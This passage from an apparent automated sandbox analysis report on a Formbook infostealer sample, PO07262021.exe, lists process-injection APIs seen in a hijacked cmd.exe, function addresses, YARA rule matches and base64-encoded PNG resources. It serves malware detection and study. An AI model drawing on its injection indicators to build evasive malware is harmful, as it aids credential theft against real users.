          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AAA770 NtOpenThread,15_2_03AAA770
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AA9A80 NtOpenDirectoryObject,15_2_03AA9A80
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AA9A20 NtResumeThread,15_2_03AA9A20
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AA9A00 NtProtectVirtualMemory,15_2_03AA9A00
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AA9610 NtEnumerateValueKey,15_2_03AA9610
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AA9A10 NtQuerySection,15_2_03AA9A10
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AA9660 NtAllocateVirtualMemory,15_2_03AA9660
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AA9670 NtQueryInformationProcess,15_2_03AA9670
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AA9650 NtQueryValueKey,15_2_03AA9650
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AA95F0 NtQueryInformationFile,15_2_03AA95F0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AA99D0 NtCreateProcessEx,15_2_03AA99D0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AA9520 NtWaitForSingleObject,15_2_03AA9520
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AAAD30 NtSetContextThread,15_2_03AAAD30
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AA9560 NtWriteFile,15_2_03AA9560
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AA9950 NtQueueApcThread,15_2_03AA9950
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AA98A0 NtWriteVirtualMemory,15_2_03AA98A0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AA98F0 NtReadVirtualMemory,15_2_03AA98F0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AA9820 NtEnumerateKey,15_2_03AA9820
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_011E6550: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPAX@Z,memset,CreateFileW,DeviceIoControl,memcpy,CloseHandle,??_V@YAXPAX@Z,memset,??_V@YAXPAX@Z,FindClose,??_V@YAXPAX@Z,15_2_011E6550
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_011E374E InitializeProcThreadAttributeList,UpdateProcThreadAttribute,memset,memset,GetStartupInfoW,lstrcmpW,CreateProcessW,CloseHandle,GetLastError,GetLastError,DeleteProcThreadAttributeList,_local_unwind4,CreateProcessAsUserW,GetLastError,CloseHandle,15_2_011E374E
          Source: C:\Users\user\Desktop\PO07262021.exeCode function: 7_2_004010267_2_00401026
          Source: C:\Users\user\Desktop\PO07262021.exeCode function: 7_2_004010307_2_00401030
          Source: C:\Users\user\Desktop\PO07262021.exeCode function: 7_2_0041D9D87_2_0041D9D8
          Source: C:\Users\user\Desktop\PO07262021.exeCode function: 7_2_0041D1AB7_2_0041D1AB
          Source: C:\Users\user\Desktop\PO07262021.exeCode function: 7_2_0041D3C47_2_0041D3C4
          Source: C:\Users\user\Desktop\PO07262021.exeCode function: 7_2_0041E5F47_2_0041E5F4
          Source: C:\Users\user\Desktop\PO07262021.exeCode function: 7_2_00402D907_2_00402D90
          Source: C:\Users\user\Desktop\PO07262021.exeCode function: 7_2_00409E407_2_00409E40
          Source: C:\Users\user\Desktop\PO07262021.exeCode function: 7_2_00409E3C7_2_00409E3C
          Source: C:\Users\user\Desktop\PO07262021.exeCode function: 7_2_0041DFE07_2_0041DFE0
          Source: C:\Users\user\Desktop\PO07262021.exeCode function: 7_2_0041DFEC7_2_0041DFEC
          Source: C:\Users\user\Desktop\PO07262021.exeCode function: 7_2_00402FB07_2_00402FB0
          Source: C:\Users\user\Desktop\PO07262021.exeCode function: 7_2_006A65077_2_006A6507
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_011F350615_2_011F3506
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_011E655015_2_011E6550
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_011E196915_2_011E1969
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_011D719015_2_011D7190
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_011F31DC15_2_011F31DC
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_011DD80315_2_011DD803
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_011DE04015_2_011DE040
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_011D9CF015_2_011D9CF0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_011F5CEA15_2_011F5CEA
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_011D48E615_2_011D48E6
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_011DCB4815_2_011DCB48
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_011E5FC815_2_011E5FC8
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_011F6FF015_2_011F6FF0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_011DFA3015_2_011DFA30
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_011D522615_2_011D5226
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_011D5E7015_2_011D5E70
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_011D8AD715_2_011D8AD7
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A9EBB015_2_03A9EBB0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A86E3015_2_03A86E30
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A9258115_2_03A92581
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A7D5E015_2_03A7D5E0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A60D2015_2_03A60D20
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A8412015_2_03A84120
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A6F90015_2_03A6F900
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B31D5515_2_03B31D55
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A920A015_2_03A920A0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A7B09015_2_03A7B090
          Source: PO07262021.exe, 00000000.00000000.642212993.00000000006D2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamecAlternateFileNameeFixedBuff.exe2 vs PO07262021.exe
          Source: PO07262021.exe, 00000007.00000002.768168332.000000000143F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO07262021.exe
          Source: PO07262021.exe, 00000007.00000002.766354813.0000000000792000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamecAlternateFileNameeFixedBuff.exe2 vs PO07262021.exe
          Source: PO07262021.exe, 00000007.00000002.768464422.000000000152D000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs PO07262021.exe
          Source: PO07262021.exeBinary or memory string: OriginalFilenamecAlternateFileNameeFixedBuff.exe2 vs PO07262021.exe
          Source: PO07262021.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 7.2.PO07262021.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.PO07262021.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.2.PO07262021.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.PO07262021.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.912674126.0000000003A00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.912674126.0000000003A00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.767554983.0000000001150000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.767554983.0000000001150000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.767309184.0000000000D00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.767309184.0000000000D00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.912452970.00000000033D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.912452970.00000000033D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.911713317.0000000001050000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.911713317.0000000001050000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: PO07262021.exe, Shelf_itemm.csBase64 encoded string: 'iVBORw0KGgoAAAANSUhEUgAAACgAAAAoCAYAAACM/rhtAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAKRJREFUeNpi/P//P8NgBkwMgxyMOnDUgaMOHHXgqANHHTjqwAEGoNYMMgYCeyA+CZIiAm8HYhWaugeLA58T6TgY3ohk/l4S9aLjvejuwRbFEiR6WhGJ/YvCAMTQz0LlFOM5mospBBSnQVo7cDQNjqZBaqTBpyQ66hEt0yC2msSDhNrkEhBr0bKqYxwdWRh14KgDRx046sBRB446cNSBQ9qBAAEGAPhFqjdpHPl0AAAAAElFTkSuQmCC'
          Source: PO07262021.exe, Lens.csBase64 encoded string: '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
          Source: PO07262021.exe, NotifactionMSG.csBase64 encoded string: 'iVBORw0KGgoAAAANSUhEUgAAACwAAAAsCAYAAAAehFoBAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAIJSURBVFhH7Zg9S8RAEED9KddoYWthoxxaKAqKCoocaiFYiApaCZbaXit2thb+Af+DpVhZeNzpiaIoWIjVei8YCMfsZj8SZDGBB0eymXmEzczkBu4nayomKuGyqYTLphIum/8l3JoeUu2lEfWwXlePWzOqu7uonvZXEvjNOa6xhrVSDFe8hFuzw6rTGFPd7Xn1dLBqBWu5h3ulmLY4C7eXR3vJ50QpG7iXGFJsG6yFW1ODqrNWFyV8IBYxpVwmrIQJ/LAxISYOgZiu0lbCRT7Zfogt5dSRK8x+kxIVicueNgrzRrtUgpeTPfV5dZnwdnosrpEgh231MApThqQEOpBMD6SlNTo6jXHRoR+tMIXe5elCiHB3Z8GquWiF6U5SYBMhwkBOySWLVpiWKgU1ESpMTskli1aYOUAKauL5aPNXV6n386a4xgQ5JZcsWuFkkBGC5pEeLlUihZySSxatcDJ1CUHzSA8fYXJKLlkKF/6+u02EpWu5hAj7bokQ4aAt4fPSwdfNtbdw0EvnU9aA9vzaPBSv5RFU1nwaB6JsCfi4OBPXmAhqHNG1Zohq+AHX8dKXwsZLiGqAT4nqEwmi+wgFAhf5pInlKgvWwinstyj+SMnCG00ZonZKUhKs5R7baqDDSziFQk93oqUyByQDE1NeD35zjmussWkKNgQJ/wWVcNlUwmUTmXBN/QCoe2Fr5J6flQAAAABJRU5ErkJggg==', 'iVBORw0KGgoAAAANSUhEUgAAACwAAAAsCAYAAAAehFoBAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAH/SURBVFhH7ZjPKwVRFMf9NTaUtbIhLC2IDXtra2t7ayUsJA8JsbCxsLGgR7yX915Kkli8nWyvPi+3NH3nx713Jk1m6lOvmTvnfJrunHPm9fWv102ZqISLphIumv8jPLh5a4a3783EXtNMHT6auZO2mT/t9OA357jGGtaqGD44Cw9t3ZnR3YaZOWqZhbNOJljLPdyrYrrgJDyy82CmHUSjcC8xVOysZBIe2Lg147WmlPCBWMRUudJIFSbw5H5+shZi+kinCuf5ZKMQW+VMIlGY/aYS5Ynrno4V5o12qQRLF8/moN3tsXL1KtcoyOFSPWKFKUMqQRxI2gNptSaOsVpDOiikMIXe5elCiPDscStzc5HCdCcVOIkQYSCncokihWmpKmgSocLkVC5RpDBzgAqaxOL504+uMas3b3JNEuRULlGkMMOLCpqGPVyqhIWcyiWKFGbiUkHTsIePMDmVS5RchZvdr56wupZGkLDvlggRDtoSPi8dXL9/egsHvXQ+ZQ1oz8uXL/JaGkFlzadxIMqWgLW7D7kmiaDGUbrWDKUafsB1vPQlt/ESSjXAW0r1iQSl+wgFAuf5pInlIwuZhC3st1L8kfIb3mjKELVTSSlYyz0u1SAOZ2ELhZ7uREtlDmB4YeICfnOOa6zJ2hSy4C38V1TCRVMJF00lXDQlE66bb+YGhyafMUw8AAAAAElFTkSuQmCC'
          Source: PO07262021.exe, ThemeContainer.csBase64 encoded string: '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
          Source: PO07262021.exe, YouPLayer.csBase64 encoded string: 'iVBORw0KGgoAAAANSUhEUgAAAAwAAAAMCAYAAABWdVznAAAACXBIWXMAAAsTAAALEwEAmpwYAAAKT2lDQ1BQaG90b3Nob3AgSUNDIHByb2ZpbGUAAHjanVNnVFPpFj333vRCS4iAlEtvUhUIIFJCi4AUkSYqIQkQSoghodkVUcERRUUEG8igiAOOjoCMFVEsDIoK2AfkIaKOg6OIisr74Xuja9a89+bN/rXXPues852zzwfACAyWSDNRNYAMqUIeEeCDx8TG4eQuQIEKJHAAEAizZCFz/SMBAPh+PDwrIsAHvgABeNMLCADATZvAMByH/w/qQplcAYCEAcB0kThLCIAUAEB6jkKmAEBGAYCdmCZTAKAEAGDLY2LjAFAtAGAnf+bTAICd+Jl7AQBblCEVAaCRACATZYhEAGg7AKzPVopFAFgwABRmS8Q5ANgtADBJV2ZIALC3AMDOEAuyAAgMADBRiIUpAAR7AGDIIyN4AISZABRG8lc88SuuEOcqAAB4mbI8uSQ5RYFbCC1xB1dXLh4ozkkXKxQ2YQJhmkAuwnmZGTKBNA/g88wAAKCRFRHgg/P9eM4Ors7ONo62Dl8t6r8G/yJiYuP+5c+rcEAAAOF0ftH+LC+zGoA7BoBt/qIl7gRoXgugdfeLZrIPQLUAoOnaV/Nw+H48PEWhkLnZ2eXk5NhKxEJbYcpXff5nwl/AV/1s+X48/Pf14L7iJIEyXYFHBPjgwsz0TKUcz5IJhGLc5o9H/LcL//wd0yLESWK